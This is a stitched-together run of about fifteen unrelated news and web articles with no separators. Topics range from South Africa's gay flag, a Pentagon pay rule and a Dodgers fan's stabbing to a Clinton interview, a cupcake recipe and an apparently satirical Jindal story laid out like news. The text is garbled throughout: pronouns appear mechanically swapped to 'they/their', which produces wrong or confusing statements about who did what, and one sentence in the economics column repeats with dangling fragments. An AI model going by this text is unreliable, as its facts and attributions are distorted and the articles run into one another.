The South African government has announced in the official Government Gazette that the Gay Flag of South Africa has been approved and accepted as the country's official gay flag (an adaptation of the international gay flag and the South African national flag).
This makes South Africa the first country in the world to officially recognize a gay flag, and likely any official LGBTI symbol.
The Department of Arts and Culture through the Bureau of Heraldry designs and registers heraldic representations such as flags and is guided by the Heraldry Act, which governs the use and protection of national symbols which is currently under the authority of the Minister of Arts & Culture.
“The Gay Flag of SA is now officially recognized and protected by the Department of Arts and Culture and the government of South Africa,” said Mava Mothiba from the department.
Article continues below
Eugene Brockman, the designer of the flag and co-founder with Henry Bantjes of the non-profit organization “Gay Flag of South Africa” that promotes the flag said, “The flag has become a symbol for both the celebration of queer South African identity and the symbol against the obstacles facing LGBTI South Africans such as hate crimes. More than that the flag has become a watch dog, and its popularity resulted in the formation of an NPO advocacy group.”
The Gay Flag of South Africa (GFSA) group is currently on tour in South Africa with a showcase of acts, going from town to town promoting the Gay Flag, equality and the right to live free of homophobia in South Africa.
The group met this week with acclaimed out gay Justice Edwin Cameron, who invited the GFSA to the constitutional court to celebrate and acknowledge the gay flag team's efforts.
This Story Filed Under
New Allotment Rule Protects Troops From Lending Scams
Defense Secretary Chuck Hagel has directed a policy change in new paycheck allotments to prevent unscrupulous commercial lenders from taking advantage of troops and their families, Pentagon officials said today.
According to a Defense Department news release published today, effective Jan. 1, 2015, the change in DoD's Financial Management Regulation will prohibit service members from allotting pay to buy, lease or rent personal property, a senior DoD official said.
Improving Protection for Service Members
According to the release, this policy change will eliminate that aspect of the allotment system most prone to abuse by unscrupulous lenders that prey on service members.
This will significantly improve protections for all service members and their families, while not significantly reducing the flexibility to use allotments for a number of legitimate purposes, the release reported.
New Allotment Changes
DoD officials said that while existing allotments are not affected, service members will no longer be able to make allotments for the following types of purchases:
-- Vehicles, such as automobiles, motorcycles and boats;
-- Appliances or household goods, such as furniture, washers and dryers;
-- Electronics, such as laptops, tablets, cell phones and televisions; and
-- Other consumer items that are tangible and moveable.
Allotments still can be used for savings account deposits, investments, to support dependents, pay insurance premiums, mortgages, rents, make Combined Federal Campaign contributions, and U.S. government debt repayments.
Another line of protection for service members and their families is included when starting new allotments through MyPay and manually on DD Form 2558, officials said.
Officials said service members must certify under the Uniform Code of Military Justice that the allotment is not for “the purchase, lease, or rental of personal property of or payment toward personal property.”
Reviewing the Allotment System
The secretary directed the change following an interagency review that began in June 2013 in response to a major enforcement action by the Consumer Financial Protection Bureau.
The team comprised DoD representatives from the comptroller, Defense Finance and Accounting Service, personnel and readiness, and general counsel offices in the Joint Staff and secretary's offices. Non-DoD participants were from the Federal Deposit Insurance Corp., CFPB, Federal Reserve Board, Comptroller of the Currency and the National Credit Union Administration.
Defense Officials said a 2012 analysis showed that the top 10 financial institutions that received allotments from service members processed almost two million allotments totaling $3.767 billion. Of the top 10 allotment processors, state law enforcement, consumer advocates, and the financial regulators have flagged three particular institutions as suspected abusers of the allotment system. Those institutions received 999,588 allotments totaling $1.380 billion in fiscal year 2012.
Allotment Usage by Rank
Officials said the 2012 analysis also found that on average per capita, warrant officers use 5.73 allotments, commissioned officers use 3.55 and enlisted personnel use 3.49 allotments, respectively. The dollar average per allotment is highest for warrant officers ($1,679 per allotment), followed by officers ($1,554 per allotment), and then enlisted personnel ($1,224 per allotment).
The new allotment rule applies to active-duty members and not military retirees or DoD civilians, officials said.
(Follow Terri Moon Cronk on Twitter: @MoonCronkDoD)
As Europe cuts, America spends
FORTUNE -- Everybody loves a fight. So I'm delighted that we're about to witness a heavyweight title bout between two of the most important ideas that can shape our material lives. The vital question: What's the best way to grow after a bad recession? We in the U.S. are betting heavily on one popular strategy, while Britain and the Euro zone are backing exactly the opposite approach. Rarely do we see such stark conflict in fundamental economic policies on a mammoth scale. The results of this natural experiment will be highly valuable because they'll teach us so much. But they will also be very bad news for one side or the other.
The New World approach, billed as Keynesian, is for the government to pour hundreds of billions of borrowed dollars into the economy to stimulate demand. Companies will hire more, consumers will spend more, and the wheels will resume turning. Then, in future years, the government can reduce the big deficits it has created. As icing on the cake, that stimulus spending can be focused on infrastructure improvements that will make the nation more competitive for decades to come. That's why the U.S. has run trillion-dollar deficits for two years in a row, and why the administration wants still more stimulus spending.
The Old World approach, called "consolidation" by its proponents, holds that people are far likelier to spend and invest in a country that's working to reduce its deficit right now, even though near-term growth may be slow or non-existent. They figure such a country is less apt to raise future taxes or to inflate its currency to ease the pain of repaying debt. That's why 35 of Britain's top business leaders recently endorsed British Prime Minister David Cameron's plan to abolish 192 government agencies and cut the budgets of major departments by 20% to 25%. "Addressing the debt problem in a decisive way will improve business," they say in an open letter. European Central Bank president Jean-Claude Trichet, consolidation's staunchest advocate, says it's good "not because it is an elementary recommendation to care for your sons and daughters, but because it is good for confidence, consumption, and investment today."
In theory, the New World policy makes some sense when the economy is still fragile, as America's is. But it cannot work in practice for at least three reasons.
People don't trust Washington to reduce the deficit two years from now. Putting off the pain until tomorrow never works, because in Washington, tomorrow never comes.
Putting off the pain until tomorrow never works, because in Washington, tomorrow never comes. People don't believe that the administration's purported future deficit reductions are real , such as the claim that the new health care reform law will reduce the deficit.
, such as the claim that the new health care reform law will reduce the deficit. People don't trust Congress to spend stimulus dollars on worthwhile infrastructure projects rather than on useless pork. Why? Google "John Murtha airport" for one example.
I fear that one result of the U.S. strategy will be little faith in America's fiscal future. Just as confidence begets more confidence, lack of it becomes a vicious cycle. As people lose confidence in a country's financial strength, they take their investments and innovations elsewhere, worsening the country's plight, driving more business away, and so on. New figures show that as U.S. companies earn impressive profits, they're stockpiling cash rather than building new U.S. operations or hiring more U.S. workers.
The opposing sides in this battle have a tough time debating each other because they have deeply different views of human nature. The New World approach regards people more than economic beings whose macro-behavior can be described with equations. The Old World approach regards people more than psychological beings whose individual behavior can be understood but not easily charted.
When we have a winner, the losing side will rationalize the results, saying they don't prove much, because the two situations were different going in, and that with a little bit of tweaking, their strategy would have prevailed. We should resolve to cut through the inevitable spin and declare a winner. Whatever the results, I'll embrace them. But I think I know how this will turn out, and it won't be good news for America
San Francisco Police Chief Greg Suhr announced a zero tolerance for fan violence after a Dodgers fan was stabbed to death following Wednesday night's Giants game at AT&T Park.
Jonathan Denver, 24, was stabbed during a fight between two groups of men after the game. It happened at Third and Perry streets, near Harrison, just a few blocks from the ballpark.
Michael Montgomery, 21, from Lodi has been arrested and charged with homicide. Their father claims their son acted in self-defense.
Chief Suhr says Montgomery made incriminating remarks to detectives. Another man is in custody and police are searching for two others in what they call, "a senseless tragedy."
Kristoff Fajardo left a blue candle at the scene where a fellow Dodgers fan was killed in an argument over the team's rivalry with the Giants.
The victim, a resident of the Mendocino County town of Fort Bragg, was decked out in Dodgers gear.
They left the game at AT&T Park in the 8th inning with their brother, their father, and two others, and headed to a local bar.
According to police, after the group left the bar around 11:30 p.m., they ran into four suspects on Third near Harrison. One suspect wore a Giants cap. Chief Suhr says those Giants fans did not attend the game and were leaving a nearby nightclub when their paths crossed and a sports beef turned deadly.
"There was an initial fight and nobody was seriously injured," Chief Suhr said. "Then that the fight stopped and for whatever reason one or more of the parties wouldn't let it go and that's when the stabbing occurred."
Police are now going door-to-door in the area, looking for the weapon and any video of the crime. Investigators say the car the suspects were driving is registered in Lodi.
We spoke with one of Denver's friends, who shared what may have been the last photo ever taken of the 24-year-old.
"He was a die-hard Dodgers fan," Matt Gomes said.
Gomes showed us a picture taken at Wednesday night's Giants-Dodgers game that shows Denver with their father and brother.
"I was just with their whole family," Gomes said. "We all just feel horrible for their mom and their brothers and just their whole family."
We spoke with a family member Thursday outside Denver's grandparent's house in Southern California. They say they're still in shock.
"The family is devastated, grandparents lost their grandson and Robert's driving home, the dad. It's their birthday today. Their son died in their arms, I guess," said David Morgan.
Denver's father works as a security guard for the Dodgers. They were in the Bay Area visiting their sons for their birthday.
Denver had just started a job as an apprentice at the North Coast Plumbing, where their boss and coworkers told us they were a fine young man trying to find their path in life.
The 24-year-old did have two recent brushes with the law in Mendocino County; one for driving under the influence in July, and a second this month, which was a drunk in public arrest at the local county fair.
Police do not know if alcohol was a factor in Wednesday night's fatal fight. Denver had no history of violence and their friend told us the victim was probably trying to protect their friends and family.
When asked what people should know about him, Gomes said, "That they were a really great guy and would do anything for everybody and always put a smile on people's faces when they were around."
On Wednesday, the team released a statement saying, "There is no rational explanation for this senseless act which resulted in Jonathan's death. The pain that this has caused their family and friends is unimaginable. Words are not enough to describe our sadness."
SFPD spokesperson Sgt. Danielle Newman says the police department is concerned for baseball fans.
"We are concerned that that may have been what took place," Sgt. Newman said. "And based on those concerns, the department and the mayor want to make sure that everyone is aware that there's no place in San Francisco for that type of violence. The rivalry needs to stay out on the ball field; not in the stands, and not on the streets. So tonight, we have an increased police presence going out."
There were a lot of officers inside the stadium and on the streets. They were in uniform and undercover, dressed in Giants and Dodger gear. But all of that aside, everyone participated in a moment of silence in honor of Denver.
The Giants and Dodgers are longtime division rivals. The Giants were the defending World Series champions. But this year, the Dodgers won the division while the Giants were set to miss the playoffs.
The Giants issued a statement saying, "We were deeply saddened to learn of last night's horrific incident that occurred several blocks from the ballpark. Our thoughts and prayers are with their family during this difficult time."
The violence comes just three days after a teenage football fan was attacked at San Francisco's Candlestick Park during the San Francisco 49ers 27-7 loss to the Indianapolis Colts. Other violence broke out at the game on Sunday despite an increase in security. The stadium was also the site of two shootings, beatings and fights during a preseason game two years ago.
Stadium security and fan behavior also came under scrutiny when another Dodgers-Giants matchup saw a Northern California paramedic severely beaten. Brian Stow, a Giants fan, suffered a traumatic brain injury after a beating by two men dressed in Dodgers gear following the March 31, 2011, home opener between the teams.
Stow's family says he's still enduring physical pain and memory loss from a severe brain injury.
The two suspects in their attack are waiting to go to trial.
The Giants are holding a fundraiser for Stow. The team will donate $10 from each ticket sold in certain sections of AT&T Park on Tuesday, Thursday and Sunday's games to a fund setup for Stow.
(Bay City News and the Associated Press have contributed to this report.)
WASHINGTON, June 12 (UPI) -- NPR's Terry Gross had a conversation with former Secretary of State Hillary Clinton on Thursday about their evolving position on same-sex marriage, an interview some are calling contentious.
When Clinton ran for the Democratic nomination in 2008, neither they nor then candidate Barack Obama were publicly in support of same-sex marriage. Both have since come out in support of marriage equality.
Gross questioned Clinton directly about how their views on same-sex marriage have evolved over time and whether their apparent change in their stance on the matter -- from not publicly supporting gay marriage to coming out in support of marriage equality -- was a calculated political move or rather the public expression of a privately held belief in light of a more favorable political climate.
Attempting to clarify how and why Clinton's position evolved over time, Gross pushed the former first lady and likely 2016 hopeful into a dialogue beyond the issue of same-sex marriage to touch on the importance of being able to re-evaluate political positions in the face of new evidence and information.
"Just because you're a politician doesn't mean you're not a thinking human being. You gather information, you think through positions, you're not one hundred percent set, thank goodness, you're constantly re-evaluating where you stand. That is true for me," Clinton told Gross when asked about their change on the issue from the nineties to today.
"I am very hopeful that we will make progress and see even more change and acceptance. One of my big problems right now is that too many people believe they have a direct line to the divine and they never want to change their mind about anything.They're never open about new information and they like to operate in an evidence-free zone. I think it's good if people continue to change," they added. "So, just to clarify, just one more question on this, would you say your view evolved since the 90s or that the American public evolved allowing you to state your real view," Gross insisted.
"I think I'm an American, I think that we have all evolved, and it's been one of the fastest, most sweeping transformations that I'm aware of," Clinton replied.
Gross continued to pressure Clinton into a more specific answer.
"I'm pretty sure you didn't answer my question about whether you evolved or it was the American public that change --"
"Because I said I'm an American so of course we all evolved and I think that's a fair conclusion --"
"So you're saying your opinion on gay marriage changed?"
In response to Gross' pushing, Clinton reaffirmed the importance of being able to grow and change one's opinions over time.
"You know, somebody is always first, Terry. Somebody is always out front and thank goodness they are. But that doesn't mean that those who join later, in being publicly supportive or even privately accepting that there needs to be change, are any less committed. You could not be having the sweep of marriage equality across the country if nobody changed their mind and thank goodness so many of us have."
At this point, the conversation becomes a little contentious as Gross pressures Clinton to clarify their earlier personal views on the issue.
"So that's one for you changed your mind?"
"You know I really, I have to say, I think you being very persistent, but you are playing with my words and playing with what is such an important issue."
"I'm just trying to clarify so I can understand—"
"No, I don't think you are trying to clarify. I think you are trying to say that I used to be opposed and now I am in favor and I did it for political reasons. And that's just flat wrong. So let me just state what I feel like I think you are implying and repudiate it. I have a strong record. I have a great commitment to this issue and I am proud of what I've done and the progress were making."
"You know I'm just saying, I'm sorry—I just want to clarify what I was saying—no, I was saying that you maybe really believed this all along, but, you know believed in gay marriage all along, but felt for political reasons America wasn't ready yet and you couldn't say it. That's what I was thinking."
"No. That is not true."
"Okay."
"I did not grow up even imagining gay marriage and I don't think you did either. This was an incredible new and important idea that people on the front lines of the gay right movement began to talk about and slowly, but surely, convinced others about the rightness of that position. When I was ready to say what I said, I said it."
"Okay, thank you for clarifying that."
Moon mission astronauts spent a lot of time on their butts. Those moon walks may have looked bouncy and peaceful, but cumbersome space suits had Apollo astronauts tripping and falling all over the place. And while it might seem silly—especially the aftermath, which looks like a kid trying to stand up in a bulky snowsuit—it's actually pretty dangerous for one of those suits to meet a shard of lunar regolith. That goes double for astronauts exploring Mars, where stronger gravity would mean falling twice as hard onto rocky ground far less forgiving than moon dust.
So to make sure that doesn't happen, Alison Gibson, graduate researcher at MIT's Man Vehicle Lab, is testing some newfangled space boots.
Since NASA isn't doing manned moon missions at the moment, astronauts wear soft boots that aren't made for walking at all—just floating around outside the International Space Station. Those are totally rigid below the knee. But even the relatively bendy moon boots won't cut it anymore. Spacesuit helmets cut astronauts' peripheral vision to basically nil, and pressurized boots are no good at feeling for obstacles. So to stay upright, astronauts spend a lot of time looking down at the ground, which isn't super conducive to science.
But how do you design a system that lets astronauts keep their heads up? "Having tactile cues on you feet is pretty intuitive," Gibson says. "On Earth that's what give us a clue to look down." That's why they designed each boot with two vibrating motors to buzz your big toe as you approach an obstacle. The vibrations ramp up as the boot gets closer and closer, and little orange dots on the boot's visual display become more opaque. And they're pretty maneuverable: Thanks to cheap 3-D printed bases, the boots weigh only a pound each.
Gibson collected motion capture data from 16 participants who strapped on the prototypes, and those tests suggest people spend significantly less time heads-down while wearing the boots. Oh, and they fall less, too. And while they emphasize that these boots are still prototypes—to qualify for flight, they'd need souped-up sensors and materials that don't give off gases that could mess with the space suit—Gibson is optimistic. "NASA wants totally new EVA suits for Mars," they say, "and I think these could be incorporated into that space suit eventually."
That's a long way off—NASA doesn't expect to even put humans in orbit around Mars until the 2030s—but these boots are exactly the kind of Occam's Razor you need in space. "The astronaut teams on Mars are going to have to be relatively autonomous, since they're not going to have real-time communication with the ground," Gibson says. Whatever the obstacle avoidance tech ends up being, it needs to be simple, robust, and reliable. There's not much NASA can do if an astronaut sends an 'I've fallen and I can't get up' message.
On Sunday morning, a group of young Muslim immigrants interrupted a Catholic procession in honor of the Virgin Mary with verbal insults, shouting, and threats as the group passed in front of the Islamic Cultural Center in Conselice, a small town in lower Romagna.
In predominantly Catholic Italy, the month of May is dedicated to the traditional processions carrying a statue or image of the Madonna, usually accompanied by the singing of hymns and praying of the rosary.
The Marian procession is a tradition in Conselice, and every year, the faithful gather at the Piazza Foresti and then proceed along a number of streets including the Via Dante Alighieri, which also passes in front of the Islamic Cultural Center. On Sunday, after the 9:30 a.m. Mass, a group of 100 faithful, including several small children preparing to receive their first Holy Communion, began the procession as usual.
Apparently understanding the procession to be a provocation, a group of Muslim youth from the Islamic Center began hurling verbal abuse and threats at the passing procession.
According to an eyewitness, “During the slow procession of the sacred image, some kids on the ground floor of the building of the headquarters of the Attadamun Islamic Cultural Center began shouting a kind of chorus like ‘Get out of here' and ‘Go away from here.'”
The participants, especially the children, were reportedly stunned and confused; they halted the procession before regrouping and hurrying past the Center.
After receiving complaints from members of St. Martin's parish, the mayor of Conselice, Paola Pula, met with representatives of the Attadamun Islamic Cultural Center on Tuesday morning.
Following the meeting, the Islamic Center prepared a formal letter of apology and delivered one copy to the mayor and another to the members of the parish.
In a statement, the mayor said that “the incident, even if it concerns the behavior of minors, is intolerable and must not be underestimated.” They also said the youth involved have been reprimanded by representatives of the center.
“We reaffirm our commitment to respect all sensibilities and religious affiliations,” they said.
Follow Thomas D. Williams on Twitter @tdwilliamsrome.
The new Windows 10 Mobile build 10512 that's now available for download for Windows Insiders enrolled in the fast ring does come with some improvements here and there, but as far as the brand-new Edge browser is concerned, it's the same feature lineup as in the previous build.
But that's going to change soon, as the Windows development team is planning to introduce major improvements to Edge in the coming builds, as revealed by a Microsoft engineer.
Microsoft Edge is Redmond's big bet for the browser war, replacing Internet Explorer after nearly 20 years of being offered as the default option in Windows. But Edge indeed comes with a wide array of new features and a fresh UI, as well as a new engine that's supposed to be a lot faster and more reliable as compared to its predecessor.
On mobile devices, Microsoft Edge is supposed to come with the same feature lineup as on the PC, as the browser will be offered as a universal app and should offer a similar experience across all devices.
That's why Microsoft is now planning to make some big changes to the mobile browser, trying to bring it in line with the PC version that's already available for everyone in the RTM build.
Extensions coming on mobile too
What's interesting is that Microsoft is aiming at offering the exact same features on all devices, so when extension support arrives on PCs, the company will start working on bringing this functionality on mobile devices too.
Extension support in Microsoft Edge will allow the browser to run Google Chrome extensions, either with no modification or only small changes to the original code.
This feature is projected to be released sometime this year, most likely in October, as part of a major update that will include several other improvements to the core Windows 10 operating system.
New Windows 10 preview for phones (build 10512) rolling out now - nothing big for Edge, but let's chat again after the next flight ;-) — Jacob Rossi (@jacobrossi) August 12, 2015
U.S. Sen. Jeff Sessions (R-AL) warns:
It appears there will be another attempt by Tuesday to force through new executive powers for President Obama. A vote for TAA next week is a vote to send fast-track to the President's desk and to grant them these broad new executive authorities. If that happens, it will empower the President to form a Pacific Union encompassing 40 percent of the world's economy and 12 nations—each with one equal vote. Once the union is formed, foreign bureaucrats will be required to meet regularly to write the Commission's rules, regulations, and directives—impacting Americans' jobs, wages, and sovereignty. The union is chartered with a “Living Agreement,” and there is no doubt it will seek to expand its membership and reach over time.
Fast-track will not only apply to the Pacific Union, but can expedite an unlimited number of yet-unseen international compacts for six years. There are already plans to advance through fast-track the Trade in Services Agreement, the goal of which includes labor mobility among more than 50 nations, further eroding the ability of the American people to control their own affairs.
Americans do not want this, did not ask for it, and are pleading from their hearts for their lawmakers to stop it.
The same people projecting the benefits of leaping into a colossal new economic union could not even accurately predict the impact of a standalone agreement with South Korea. The latter deal, which promised to boost our exports to them $10 billion, instead only budged them less than $1 billion, while South Korea's imports to us increased more than $12 billion, nearly doubling our trading deficit. This new agreement will only further increase our trading deficit: opening our markets to foreign imports while allowing our trading partners to continue their non-tariff barriers that close their markets to ours.
If we want a new trade deal with Japan, or with Vietnam, then they should be negotiated bilaterally and sent to Congress under regular order. Under no circumstances should the House authorize, through fast-track, the formation of a new international commission that will regulate not only trade, but immigration, labor, environmental, and all manner of commercial policy.
What American went to the polls in 2014 to vote for fast-track and a new global union? Can anyone honestly say that Congress is trying to ram this deal through because they think their constituents want it?
While elites dream of a world without borders, voters dream of a world where the politicians they elect put this country's own citizens first.
The movement among Americans toward a decent, honest populism—toward a refocusing on the needs of American citizens and American interests—grows stronger by the day. Every vote to come before Congress, beginning with the next fast-track push, will face this test: does your plan strengthen or weaken the social and economic position of the loyal, everyday working American?
The Dodgers signed left-handed pitch Scott Kazmir to a three-year, $48 million contract. (Photo: John Rieger, USA TODAY Sports)
The Los Angeles Dodgers are slated to attack the National League with a rare quintet — an all-left-handed starting rotation.
That notion became a distinct possibility Wednesday when the club announced it signed Scott Kazmir to a three-year, $48 million contract.
Kazmir's signing at long last augments a pitching staff stung by the defection of Cy Young runner-up Zack Greinke to the Arizona Diamondbacks. The club backed out of a three-year deal with Hisashi Iwakuma over physical concerns and pulled out of a trade for former Cincinnati Reds closer Aroldis Chapman after details of an alleged domestic violence incident came to light.
Now, it turns to Kazmir, 31, who has a 98-90 career record and continues a career renaissance just three years after they were relegated to pitching for the independent Sugar Land (Texas) Skeeters.
He'll join a rotation featuring — at least for now — perennial Cy Young contender Clayton Kershaw and fellow southpaws Brett Anderson, Hyun-jin Ryu and Alex Wood.
Kazmir posted a 3.10 ERA over 183 innings for the Oakland Athletics and Houston Astros last season, and was the losing pitcher in Game 2 of the AL Division Series for the Astros. That completed a two-year, $20 million contract they signed with Oakland before the 2014 season, when they pitched 190 innings, won 15 games and posted a 1.16 walks per innings pitched (WHIP).
They suffered second-half fades in each of those seasons, however, posting a 2.38 ERA before the 2014 All-Star break, and 5.42 after. In 2015, those marks were 2.49 and 3.86.
The Dodgers could also remain aggressive on the trade market to augment their rotation, although a deal for a top-shelf ace like Jose Fernandez still seems remote.
What a great day to officially be a Dodger! Happy birthday to my lefty idol Sandy Koufax! — Scott Kazmir (@scottkazmir19) December 30, 2015
PHOTOS: TOP MLB FREE AGENTS
My sister's birthday was last weekend and I wanted to make them a one of a kind cupcake. With inspiration from the strawberry festival that has been going on here in FL I decided to make a rendition of the strawberry shortcake. These stuffed shortcakes with strawberry & rosemary vodka frosting are a great way to kick off the spring season with a kick of liquor to get the party started.
Shortcakes are traditionally supposed to be more like biscuits, but over the years the line has been crossed from biscuit to cake. This shortcake recipe is a lot more like a cake than a biscuit. There is no cutting in butter involved in this! Also there is no heavy cream in this recipe, it calls for Greek yogurt and milk instead, which is healthier!
I used a coconut whipped cream to stuff the angel food cupcake. Traditionally strawberry shortcake has whipped cream on top. I decided to place it in the center of the cake instead for a delightfully creamy surprise!
I was trying to figure out how to add the rosemary flavor to the cupcake and decided a rosemary infused vodka would do the trick and it turned out amazing! The rosemary and the strawberry flavors blended so well without an overpowering vodka flavor. I highly recommend this icing recipe. This can always be left out of the frosting for a virgin version of the dessert, just make sure you replace the vodka with another 1/2 cup of butter.
Stuffed Shortcakes with Strawberry & Rosemary Vodka Frosting Serves: 12 Shortcake 1 2/3 C Flour
1/2 tsp baking powder
1/4 tsp baking soda
1/2 tsp salt
1/2 C unsalted butter
1 C sugar
2 egg whites
3/4 C milk
1/4 C plain Greek yogurt
2 tsp maple syrup (or vanilla extract) Coconut Whipped Cream 1 (14 oz.) can Full Fat Coconut Milk
1 tsp Honey Strawberry Rosemary Vodka Frosting 3/4 C Unsalted Butter, softened
4-5 C Powdered Sugar
1/4 C Rosemary Infused Vodka (see note below)
4 TBS Strawberry Syrup
1 TBS Vanilla Extract
Milk/Half & Half/Whipping cream to make a smoother consistency if needed
Fresh strawberries, hulled and halved, for garnish ***Rosemary infused vodka: Pour 1/4 C vodka (of good quality) over 1 sprig rosemary and let sit 24 hours. Remove rosemary sprig prior to using in the icing. ***NOTE: Substitute another 1/2 C Unsalted Butter for vodka if you would like to make this a virgin frosting. If you still want the rosemary flavor in this recipe you can add it to the butter using this recipe here: The Little Epicurian Instructions: Cupcakes Mix together flour, baking soda, baking bowder and salt in a medium bowl and set aside Melt butter and let cool. Once cool add sugar and whisk until combined Add egg whites, milk, greek yogurt and maple syrup (or vanilla extract) and whisk again until combined (dough will be thick) Divide batter into 12 lined cupcake tins, filling cups ~3/4 of the way full Bake 20 minutes in a 350-degree oven When cupcakes are cooled, used the end of a spoon to make a small hole in the middle of the cupcake to make room for the whipped cream Instructions: Coconut Whipped Cream Refrigerate the can of coconut milk upside down for 8 hours Chill beaters and mixing bowl 15 min prior to making the whipped cream Scoop coconut milk into mixing bowl and beat 3-4 minutes on medium speed until creamy, add honey during this time Place in refrigerator if the cream becomes too thin Using a pastry bag, fill the middle of each cupcake with whipped cream Instructions: Strawberry Vodka Frosting Combine butter, vodka, strawberry sauce, and powdered sugar together. Add vanilla extract and beat on high for 20 seconds Add milk/half & half/whipping cream 1 TBS at a time until buttercream has the consistency to hold its shape Frost and garnish each cupcake Adapted From: OMG Chocolate Desserts, Healthy Liv, Christina's Cucina, and Add A Pinch
I would pair this cupcake with a very sweet pink moscato to balance the sweetness of the cupcake, but because my sister also loves red velvet cake I decided to buy them a bottle of the Cupcake Vineyards 2013 Red Velvet. You could pair this with your steak dinner before your cupcake dessert if you please. This wine has aromas of fruits and cherries as well as a hint of chocolate. The taste is smooth and creamy with some mocha thrown in there!
Like this: Like Loading...
Passerby shoots, kills suspect fighting deputy on I-75
ESTERO, Fla. — A passerby shot and killed a person who was fighting with a Lee County Sheriff's Office deputy on Interstate 75 Monday morning.
Deputy First Class Dean Bardes, a 12-year-veteran, was working a crash at mile marker 126 when the suspect came upon him, causing Bardes to pursue them at high speeds, according to multiple sources.
Bardes and the suspect exited their vehicles at the Corkscrew Road exit and a fight started, sources said. The suspect was armed, Bardes told their supervisors, according to sources.
The passerby, who had a Concealed Weapons License, exited their vehicle and told the suspect he'd shoot them if they didn't stop beating the deputy, sources said.
After noncompliance from the suspect, the passerby shot the suspect three times, sources said. The suspect later died.
Video captured by a witness appears to show an emergency crew giving CPR in an effort to revive the suspect at the scene.
Although Bardes was crying for help, they were not shot, sources said. They were treated and released from Lee Memorial Hospital.
It was unclear whether Bardes fired their weapon.
Deputies spent part of Monday afternoon searching the median of I-75 in both directions between mile markers 126 & 127, sources said. They did not immediately say what they were searching for.
The southbound ramp at Exit 123 reopened shortly after 7 p.m. after it was closed for nearly nine hours, causing a traffic backup for several miles.
Rick Maestas witnessed the events that led up to the incident:
Witnesses have shared what they saw on the WINK News Facebook page:
Experts, including Florida Gulf Coast University criminal justice professor Pam Seay and Fort Myers-based International Firearm Safety Inc. owner Alecs Dean, addressed the passerby's use of deadly force.
A witness described what happened in the moments leading up to the shooting, and WINK News producer Katie Cribbs spoke about what they saw at the scene:
Here's video of a chopper landing on the exit ramp, sent by WINK News reporter Andrew Scheinthal:
WINK News reporter Britni McDonald was at Lee Memorial Hospital when Dean Bardes was released. They could be seen wearing bandages and hugging other deputies as they left.
1 of 10
Reporter: Katie Cribbs
Britni McDonald
Olivia Mancino
EDMONTON
Conservative Edmonton-Sherwood Park MP Tim Uppal said they learned through news reports that their younger brother had been charged in a dial-a-dope operation busted by Edmonton city police.
“Yesterday, I learned through the media of charges against my brother,” said Uppal, 40, Minister of State for Multiculturalism, in an email response on Wednesday.
“I have always spoken out against drugs in our communities,” added Uppal, elected to the House of Commons in 2008 and appointed Minister of State for Democratic Reform in 2011 before their current 2013 appointment.
“Anyone found guilty of such offences should face the full force of the law.”
A tip from the public led members of the Edmonton police Specialized Traffic Apprehension Team (STAT) to a large stash of weapons and drugs at three homes on the city's south-side. On Nov. 20, officers searched a vehicle and three homes on the city's south-side and seized a .38 special revolver and a .25 semi-automatic pistol with the serial number removed. A Taser, hatchet, cocaine press, digital scales, $12,000 cash, $26,900 worth of cocaine, 1,585 grams of buff, 16.6 grams of hashish, and 90.2 grams of marijuana worth approximately $1,350 was also seized.
Thirty criminal charges involving weapons and drugs have since been laid against four men, one of whom is Uppal's 28-year-old brother.
Raymanpreet Singh Uppal; John Edward Saul, 27; Jared Joseph Perner, 25; and Arman Deep Singh Hanjrah, 21; were each charged with possession for the purpose of trafficking (cocaine), possession for the purpose of trafficking (marijuana), possession for the purpose of trafficking (hashish), and possession of stolen property over $5,000 (proceeds of crime). Uppal was also charged with possession of an offensive weapon dangerous to public.
Share. PS3 and Vita players will have to wait a bit longer. PS3 and Vita players will have to wait a bit longer.
Update: Sony has confirmed that despite the delay, a Sly Cooper: Thieves in Time demo will still be included in this month's Ratchet & Clank Collection in North America. Regarding the new release date, a Sony spokesperson provided IGN with the following statement:
"Sly Cooper: Thieves in Time will be releasing in February 2013 for PlayStation 3 and PlayStation Vita. With a robust and diverse catalog of first and third party content launching this holiday season– including Wonderbook: Book of Spells, PlayStation All Stars: Battle Royale, Little Big Planet Karting, Assassin's Creed III, Assassin's Creed III Liberation, Madden 13 and Call of Duty: Black Ops Declassified – we have decided to release Sly Cooper: Thieves in Time in February 2013 to ensure gamers continue to have a variety of content to enjoy after the holidays and into the New Year."
Original story follows:
Sony has announced that Sly Cooper: Thieves in Time will now be released in early 2013. Despite previously being slated for 2012, Sony broke the news that Thieves in Time will now be coming next year in the game's newest gameplay trailer, seen below.
Exit Theatre Mode
A reason for the delay hasn't been revealed, and it's currently unknown if this will affect the release of the Thieves in Time demo, which was scheduled to be included with the Ratchet & Clank Collection later this month. We've reached out to Sony to clarify and will update with any comment we receive.
Earlier today, Sony also revealed that buying Sly Cooper (and other games) on PS3 nets you the Vita version for free via its new Cross Buy promotion.
For more on Sly Cooper: Thieves in time on Vita -- and exactly how it will interact with the PlayStation 3 version -- check out our impressions from shortly before E3.
Andrew Goldfarb is IGN's associate news editor. Keep up with pictures of the latest food he's been eating by following them on Twitter or IGN.
BATON ROUGE, LA — Gov. Bobby Jindal's last known supporter in the state of Louisiana has finally thrown in the towel.
After months of speculation, Bobby Pendergrast, a small-business owner in Baton Rouge, told reporters on Wednesday that they were no longer able to defend the “calamitous circus” that is the Jindal administration.
“I just can't do it anymore,” a visibly exasperated Pendergrast said. “Honestly, I never believed Jindal was as banal and dim-witted as they sounded — I figured they were pretending to be stupid, the way Matthew McConaughey pretends to drive a Lincoln in those commercials. But I was wrong — terribly, terribly wrong. Just look at the ruinous mess Jindal's left in their wake,” Pendergrast continued.
“The last few years have been a cavalcade of blunders and betrayals. By every conceivable measure, he's failed.
“I discovered that Jindal's brother actually works for a law firm lobbying on behalf of BP. I mean, how the hell can I defend that?”
“Economically, he's a disaster. Just look at their budget this year. Because they failed to balance the books, they decided to skim something like $250 million from the public health care system, which is devastating to thousands of Louisianians and only superficially improves their final numbers. And this is after they denied extra Medicaid money offered by Obama for no reason other than to boost their national political profile. It's all smoke and mirrors, though. We've got a $1.4 billion deficit — that's on him. Yet they have the audacity to parade around the country touting their fiscal conservatism. Unbelievable.
“Jindal's record on education is worse,” Pendergrast explained. “Hell, I don't even know where to begin. Currently, he's proposing a $300 million cut to higher education — another gimmick designed to mask their failed economic policies — a move that would decimate our public universities. The double-dealing dilettante has already levied unprecedented cuts on the system in recent years. Like so much of Louisiana's infrastructure, the university system is just another casualty of Jindal's insatiable careerism.
